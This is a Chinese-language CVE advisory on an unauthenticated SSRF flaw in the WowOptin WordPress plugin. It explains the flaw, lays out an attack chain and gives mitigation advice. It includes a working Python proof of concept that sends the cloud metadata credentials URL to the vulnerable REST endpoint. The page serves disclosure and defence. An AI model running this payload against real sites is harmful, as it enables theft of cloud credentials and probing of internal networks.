CVE-2026-4302 CVSS 7.2 高危

CVE-2026-4302: WowOptin插件SSRF漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4302

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WowOptin: Next-Gen Popup Maker

漏洞概述

WowOptin插件在所有版本（包括1.4.29）中存在服务器端请求伪造（SSRF）漏洞。该插件公开的REST API端点未进行身份验证，且直接将用户输入的URL传递给请求函数，未进行任何安全校验。未经身份验证的攻击者可利用该漏洞从服务器端发起对任意目标的网络请求，从而探测内网、访问内部服务信息或进行进一步的攻击。

技术细节

该漏洞源于WowOptin插件在处理Webhook集成时的安全缺陷。插件注册了一个名为`optn/v1/integration-action`的REST API端点，但其权限验证函数被错误地设置为`__return_true`，这意味着任何未经身份验证的匿名用户都可以访问该接口。在核心逻辑中，`Webhook::add_subscriber()`方法直接接收用户提交的URL参数，并将其传递给WordPress的HTTP请求函数`wp_remote_get()`和`wp_remote_post()`。由于缺乏必要的URL格式验证和内网IP过滤机制，且未使用具有安全防护功能的`wp_safe_remote_get/post`函数，攻击者可以利用此缺陷构造恶意请求，诱导服务器向内网敏感资源（如本地管理端口、云元数据服务）发送请求，进而探测内网拓扑或窃取敏感数据。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点安装了WowOptin插件，且版本在1.4.29及以下。

STEP 2

发送恶意请求

攻击者向`/wp-json/optn/v1/integration-action`端点发送POST请求，请求体中包含指向内网敏感资源（如127.0.0.1或云元数据API）的URL参数。

STEP 3

服务端请求伪造

由于插件未验证URL且未使用安全函数，服务器端执行`wp_remote_get`，向攻击者指定的内网地址发起HTTP请求。

STEP 4

信息泄露

内网服务响应请求，将敏感数据返回给WordPress插件，插件可能将部分响应信息泄露给攻击者，或者攻击者通过时间差判断服务存活状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_ssrf(target_url, internal_url):
    """
    PoC for CVE-2026-4302
    Target: WordPress WowOptin Plugin
    """
    # The vulnerable endpoint
    endpoint = "/wp-json/optn/v1/integration-action"
    
    full_url = f"{target_url}{endpoint}"
    
    # Payload containing the internal URL to access
    # Example: accessing AWS metadata or local localhost
    payload = {
        "url": internal_url 
    }
    
    try:
        response = requests.post(full_url, json=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request successful! Server responded with status {response.status_code}")
            print(f"[+] Response body: {response.text[:200]}")
            print("[+] This indicates the server is processing the external request.")
        else:
            print(f"[-] Server responded with status {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with target WordPress site
    internal = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Example internal target
    check_ssrf(target, internal)

影响范围

WowOptin: Next-Gen Popup Maker <= 1.4.29

防御指南

临时缓解措施

如果无法立即升级插件，建议通过服务器配置（如Nginx/Apache规则）阻断对`/wp-json/optn/v1/integration-action`路径的外部访问。同时，严格限制服务器的出站网络访问权限，仅允许必要的对外通信，以防止SSRF攻击指向内部敏感服务。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表